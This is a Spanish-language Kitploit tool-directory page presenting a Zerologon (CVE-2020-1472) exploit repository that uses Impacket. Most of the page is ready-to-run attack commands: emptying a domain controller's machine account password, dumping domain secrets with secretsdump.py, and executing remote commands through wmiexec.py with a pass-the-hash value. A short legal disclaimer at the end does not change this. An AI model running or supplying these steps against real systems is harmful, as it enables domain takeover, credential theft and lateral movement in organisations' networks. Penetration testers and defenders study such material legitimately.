Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ZerologonWithImpacket-CVE2020-1472 — Una prueba de concepto práctica para CVE-2020-1472 (Zerologon) que utiliza la librería Impacket para explotar la vulnerabilidad de Netlogon y obtener acceso no autorizado al controlador de dominio. | Kitploit
Herramientas/GitHubGitHub/tuancui22/zerologonwithimpacket-cve2020-1472
Escalada de PrivilegiosAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónMovimiento LateralPost-ExplotaciónPruebas de PenetraciónAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
tuancui22/zerologonwithimpacket-cve2020-1472

ZerologonWithImpacket-CVE2020-1472

Una prueba de concepto práctica para CVE-2020-1472 (Zerologon) que utiliza la librería Impacket para explotar la vulnerabilidad de Netlogon y obtener acceso no autorizado al controlador de dominio.

Ver Repositorio
1hace 1 añoAún no revisado

Exploit combinado de Zerologon e Impacket (CVE-2020-1472)

Este repositorio contiene una implementación actualizada (2024) del exploit Zerologon combinado con las herramientas de Impacket para explotar CVE-2020-1472 (Zerologon). Este exploit tiene como objetivo entornos Windows Server para manipular las contraseñas de cuentas de máquina y realizar movimiento lateral.

Características

  • Explota CVE-2020-1472 (Zerologon) para establecer la contraseña de la cuenta de máquina del objetivo como una cadena vacía.
  • Utiliza las herramientas de Impacket para volcar credenciales y ejecutar comandos en la máquina víctima.

Requisitos

  1. Python 3.x
  2. Instala las dependencias requeridas ejecutando:
    root@kitploit:~
    pip install -r requirements.txt
    

Uso

Escenario de ejemplo

  • Víctima: Windows Server 2016
  • Atacante: Kali Linux (o sistema Windows)

Comandos de explotación (Kali Linux)

  1. Establece la contraseña de la cuenta de máquina como una cadena vacía:
    root@kitploit:~
    python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. Vuelca los secretos del Controlador de Dominio:
    root@kitploit:~
    python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
    
  3. Ejecuta comandos en la máquina víctima:
    root@kitploit:~
    python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

Comandos de explotación (atacante Windows)

  1. Establece la contraseña de la cuenta de máquina como una cadena vacía:
    root@kitploit:~
    python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. Vuelca los secretos del Controlador de Dominio:
    root@kitploit:~
    python secretsdump.py -just-dc "tancongmang/[email protected]"
    
  3. Ejecuta comandos en la máquina víctima:
    root@kitploit:~
    python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

Notas

  • Reemplaza WIN-C9PAHHGJN91 y 192.168.40.145 con el nombre de host y la dirección IP reales del objetivo.
  • Asegúrate de tener la autorización adecuada antes de utilizar esta herramienta.
  • Esta herramienta es solo para fines educativos y de pruebas de penetración.

Aviso legal

Usa esta herramienta de manera responsable. El uso no autorizado de esta herramienta para explotar sistemas sin permiso explícito es ilegal y poco ético. Los autores no son responsables de ningún uso indebido o daño causado por esta herramienta.

Descargar herramienta